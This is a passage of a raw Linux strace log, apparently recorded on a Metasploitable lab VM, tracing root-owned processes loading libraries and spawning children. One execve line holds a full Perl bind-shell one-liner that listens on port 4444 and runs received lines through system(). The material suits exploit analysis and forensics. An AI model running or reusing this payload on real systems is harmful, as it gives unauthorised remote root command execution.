10087 07:31:18.731927 close(1)          = 0

10087 07:31:18.731939 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10087 07:31:18.732050 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

10087 07:31:18.732101 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10087 07:31:18.732236 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10087 07:31:18.732253 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da7000

10087 07:31:18.732264 mmap2(0xb7db0000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7db0000

10087 07:31:18.732279 close(1)          = 0

10087 07:31:18.732300 munmap(0xb7f62000, 29913) = 0

10087 07:31:18.732315 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10087 07:31:18.732329 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10087 07:31:18.732340 _llseek(1, 0, [0], SEEK_CUR) = 0

10087 07:31:18.732352 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10087 07:31:18.732368 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f69000

10087 07:31:18.732379 _llseek(1, 1624, [1624], SEEK_SET) = 0

10087 07:31:18.732393 munmap(0xb7f69000, 1624) = 0

10087 07:31:18.732403 close(1)          = 0

10087 07:31:18.732431 getpgrp()         = 3831

10087 07:31:18.732440 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10087 07:31:18.732455 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10087 07:31:18.732471 brk(0x8101000)    = 0x8101000

10087 07:31:18.732501 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10087 07:31:18.732515 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10087 07:31:18.732575 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10087 07:31:18.732647 brk(0x8102000)    = 0x8102000

10087 07:31:18.732673 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10087 07:31:18.732691 stat64("/sbin/AB", 0xbf862eb8) = -1 ENOENT (No such file or directory)

10087 07:31:18.732703 stat64("/bin/AB", 0xbf862eb8) = -1 ENOENT (No such file or directory)

10087 07:31:18.732718 stat64("/usr/sbin/AB", 0xbf862eb8) = -1 ENOENT (No such file or directory)

10087 07:31:18.732729 stat64("/usr/bin/AB", 0xbf862eb8) = -1 ENOENT (No such file or directory)

10087 07:31:18.732742 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10087 07:31:18.732756 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7ddd6f8) = 10088

10088 07:31:18.732799 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10088 07:31:18.732815 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10088 07:31:18.732828 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10088 07:31:18.732840 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10088 07:31:18.732881 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10088 07:31:18.732915 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10088 07:31:18.732945 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10088 07:31:18.733043 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10088 07:31:18.733058 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10088 07:31:18.733142 exit_group(127)   = ?

10087 07:31:18.737516 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10087 07:31:18.737516 --- SIGCHLD (Child exited) @ 0 (0) ---

10087 07:31:18.737516 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10088

10087 07:31:18.737516 waitpid(-1, 0xbf862b38, WNOHANG) = -1 ECHILD (No child processes)

4519  07:31:18.737517 waitpid(10087,  <unfinished ...>

10087 07:31:18.737517 sigreturn()       = ? (mask now [])

10087 07:31:18.737517 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10087 07:31:18.737517 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10087 07:31:18.737517 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10087 07:31:18.737526 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10087 07:31:18.737544 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10087 07:31:18.737555 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10087 07:31:18.737589 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10087 07:31:18.737608 stat64("/sbin/perl", 0xbf862ee8) = -1 ENOENT (No such file or directory)

10087 07:31:18.737620 stat64("/bin/perl", 0xbf862ee8) = -1 ENOENT (No such file or directory)

10087 07:31:18.737631 stat64("/usr/sbin/perl", 0xbf862ee8) = -1 ENOENT (No such file or directory)

10087 07:31:18.737643 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10087 07:31:18.737661 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10087 07:31:18.737685 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10087 07:31:18.737699 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7ddd6f8) = 10089

10089 07:31:18.737741 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10089 07:31:18.737756 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10089 07:31:18.737798 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10089 07:31:18.737812 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10089 07:31:18.737844 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10089 07:31:18.737860 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10089 07:31:18.737893 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10089 07:31:18.737941 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10089 07:31:18.738023 brk(0)            = 0x8153000

10089 07:31:18.738042 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10089 07:31:18.738058 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f03000

10089 07:31:18.738074 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10089 07:31:18.738090 open("/etc/ld.so.cache", O_RDONLY) = 1

10089 07:31:18.738102 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10089 07:31:18.738119 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7efb000

10089 07:31:18.738133 close(1)          = 0

10089 07:31:18.738144 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10089 07:31:18.738159 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10089 07:31:18.738173 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10089 07:31:18.738264 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10089 07:31:18.738333 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef7000

10089 07:31:18.738345 mmap2(0xb7ef9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ef9000

10089 07:31:18.738361 close(1)          = 0

10089 07:31:18.738373 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10089 07:31:18.738387 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

10089 07:31:18.738401 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

10089 07:31:18.738490 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

10089 07:31:18.738507 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ed2000

10089 07:31:18.738518 mmap2(0xb7ef5000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7ef5000

10089 07:31:18.738533 close(1)          = 0

10089 07:31:18.738545 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10089 07:31:18.738559 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

10089 07:31:18.738573 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

10089 07:31:18.738664 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

10089 07:31:18.738681 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ed1000

10089 07:31:18.738693 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eb9000

10089 07:31:18.738704 mmap2(0xb7ecd000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7ecd000

10089 07:31:18.738719 mmap2(0xb7ecf000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ecf000

10089 07:31:18.738732 close(1)          = 0

10089 07:31:18.738744 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10089 07:31:18.738757 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10089 07:31:18.738799 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10089 07:31:18.738905 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10089 07:31:18.738923 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d6a000

10089 07:31:18.738934 mmap2(0xb7eb3000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7eb3000

10089 07:31:18.738949 mmap2(0xb7eb6000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eb6000

10089 07:31:18.738962 close(1)          = 0

10089 07:31:18.738974 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10089 07:31:18.738987 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

10089 07:31:18.739002 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

10089 07:31:18.739094 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

10089 07:31:18.739111 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d38000

10089 07:31:18.739122 mmap2(0xb7d41000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d41000

10089 07:31:18.739137 mmap2(0xb7d43000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d43000

10089 07:31:18.739150 close(1)          = 0

10089 07:31:18.739173 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d37000

10089 07:31:18.739186 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d378c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10089 07:31:18.739242 mprotect(0xb7eb3000, 4096, PROT_READ) = 0

10089 07:31:18.739312 munmap(0xb7efb000, 29913) = 0

10089 07:31:18.739326 set_tid_address(0xb7d37908) = 10089

10089 07:31:18.739335 set_robust_list(0xb7d37910, 0xc) = 0

10089 07:31:18.739345 futex(0xbfd249c0, 0x81 /* FUTEX_??? */, 1) = 0

10089 07:31:18.739359 rt_sigaction(SIGRTMIN, {0xb7ebd2c0, [], SA_SIGINFO}, NULL, 8) = 0

10089 07:31:18.739372 rt_sigaction(SIGRT_1, {0xb7ebd340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

10089 07:31:18.739384 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

10089 07:31:18.739398 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

10089 07:31:18.739416 uname({sys="Linux", node="metasploitable", ...}) = 0

10089 07:31:18.739461 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

10089 07:31:18.739507 brk(0)            = 0x8153000

10089 07:31:18.739517 brk(0x8174000)    = 0x8174000

10089 07:31:18.739561 getuid32()        = 0

10089 07:31:18.739571 geteuid32()       = 0

10089 07:31:18.739580 getgid32()        = 0

10089 07:31:18.739589 getegid32()       = 0

10089 07:31:18.739625 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d16000

10089 07:31:18.739650 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

10089 07:31:18.739667 read(1, "\223\307\371\35", 4) = 4

10089 07:31:18.739681 close(1)          = 0

10089 07:31:18.739699 time(NULL)        = 1495625478

10089 07:31:18.739744 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfd24690) = -1 ENOENT (No such file or directory)

10089 07:31:18.739791 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfd24690) = -1 ENOENT (No such file or directory)

10089 07:31:18.739813 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfd24690) = -1 ENOENT (No such file or directory)

10089 07:31:18.739853 stat64("/usr/local/lib/perl/5.8.7", 0xbfd247d0) = -1 ENOENT (No such file or directory)

10089 07:31:18.739867 stat64("/usr/local/share/perl/5.8.7", 0xbfd247d0) = -1 ENOENT (No such file or directory)

10089 07:31:18.739879 stat64("/usr/local/lib/perl/5.8.6", 0xbfd247d0) = -1 ENOENT (No such file or directory)

10089 07:31:18.739891 stat64("/usr/local/share/perl/5.8.6", 0xbfd247d0) = -1 ENOENT (No such file or directory)

10089 07:31:18.739902 stat64("/usr/local/lib/perl/5.8.4", 0xbfd247d0) = -1 ENOENT (No such file or directory)

10089 07:31:18.739914 stat64("/usr/local/share/perl/5.8.4", 0xbfd247d0) = -1 ENOENT (No such file or directory)

10089 07:31:18.739926 stat64("/usr/local/lib/perl/5.8.3", 0xbfd247d0) = -1 ENOENT (No such file or directory)

10089 07:31:18.739937 stat64("/usr/local/share/perl/5.8.3", 0xbfd247d0) = -1 ENOENT (No such file or directory)

10089 07:31:18.739949 stat64("/usr/local/lib/perl/5.8.2", 0xbfd247d0) = -1 ENOENT (No such file or directory)

10089 07:31:18.739960 stat64("/usr/local/share/perl/5.8.2", 0xbfd247d0) = -1 ENOENT (No such file or directory)

10089 07:31:18.739972 stat64("/usr/local/lib/perl/5.8.1", 0xbfd247d0) = -1 ENOENT (No such file or directory)

10089 07:31:18.739987 stat64("/usr/local/share/perl/5.8.1", 0xbfd247d0) = -1 ENOENT (No such file or directory)

10089 07:31:18.739999 stat64("/usr/local/lib/perl/5.8.0", 0xbfd247d0) = -1 ENOENT (No such file or directory)

10089 07:31:18.740011 stat64("/usr/local/share/perl/5.8.0", 0xbfd247d0) = -1 ENOENT (No such file or directory)

10089 07:31:18.740034 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd244c8) = -1 ENOTTY (Inappropriate ioctl for device)

10089 07:31:18.740047 _llseek(0, 0, [0], SEEK_CUR) = 0

10089 07:31:18.740059 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd244c8) = -1 EBADF (Bad file descriptor)

10089 07:31:18.740070 _llseek(1, 0, 0xbfd24510, SEEK_CUR) = -1 EBADF (Bad file descriptor)

10089 07:31:18.740081 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd244c8) = -1 EINVAL (Invalid argument)

10089 07:31:18.740092 _llseek(2, 0, 0xbfd24510, SEEK_CUR) = -1 ESPIPE (Illegal seek)

10089 07:31:18.740102 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

10089 07:31:18.740115 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd24588) = -1 ENOTTY (Inappropriate ioctl for device)

10089 07:31:18.740125 _llseek(1, 0, [0], SEEK_CUR) = 0

10089 07:31:18.740136 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

10089 07:31:18.740148 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

10089 07:31:18.740166 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

10089 07:31:18.740218 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

10089 07:31:18.740228 getppid()         = 10087

10089 07:31:18.740228 stat64("/etc/perl/IO.pmc", 0xbfd2427c) = -1 ENOENT (No such file or directory)

10089 07:31:18.740228 stat64("/etc/perl/IO.pm", 0xbfd2418c) = -1 ENOENT (No such file or directory)

10089 07:31:18.740228 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbfd2427c) = -1 ENOENT (No such file or directory)

